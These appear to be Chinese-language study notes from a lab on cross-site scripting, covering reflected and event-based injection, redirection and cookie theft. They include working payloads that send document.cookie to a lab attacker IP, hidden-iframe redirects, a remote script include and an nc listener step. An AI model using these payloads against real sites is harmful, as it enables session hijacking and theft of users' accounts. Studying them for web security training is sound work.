XSS跨站脚本攻击
XSS(cross-site scripting):
- 跨站脚本攻击
- 攻击WEB客户端
- 客户端脚本语言
- 弹窗警告、广告
- javascript
- 在浏览器中执行
通过web站点漏洞,向客户端交付恶意脚本代码,实现对客户端的攻击
- 注入客户端脚本代码
- 盗取cookie
- 重定向
注入客户端脚本代码
1.发包
##通过js脚本
##alert弹窗
##执行效果:
xss弹窗
##url编码
2.回包
3.将新的标签页发送给被害者 ##直接弹窗
使用场景:
1.发包
- 直接嵌入<script>alert('xss')</script>
- 元素事件<body οnlοad=alert('xss')>
- <a href=http://192.168.5.128>click</a>
- ##a标签
- ##创链接,做按钮
- <img src=http://192.168.5.128/a.jpg οnerrοr=alert('xss')>
- ##访问某一个网站的一块
- ##Error:没访问到,就会弹窗
- <a href=" οnclick=alert('xss')>type</a>
反射型
事件型
重定向
服务器,攻击者,被害者,第三方站点
1.攻击者提交js脚本给服务端重定向
2.服务端将带有js脚本的页面给攻击者
2.攻击者发送url给被害者
3.被害者访问页面,重定向入第三方
重定向:
<script>window.location="http://www.baidu.com"</script>
##创链接,链接内无内容
##点一下,触发弹窗
重定向:
<script>window.location="http://192.168.5.128'</script>
<iframe src='http://192.168.5.128/a.jpg' height='0' width='0'>,/iframe>
##后面跟上重定向的链接
反射型
事件型
盗取cookie
服务器接收cookie值,反弹对应页面
cookie值:用户信息
将链接发送给被害者
被害者访问,触发,返回对应cookie值
获取cookie:<script>new
image().src="http://192.168.5.128/c.php?output="+document.cookie;</sript>
##把对应的cookie值访问链接
##提交对应的js工具
<script>alert(document.cookie)</script>
##打开终端
##做一个nc,监听默认80端口
<script src='http://192.168.5.128/a.js'></script>
##攻击者方提交对应脚本
##接受了对应数据包
var img = new Image(); img.src = 'http://192.168.5.128:88/cookie.php?cookie='+document.cookie;
反射型
事件型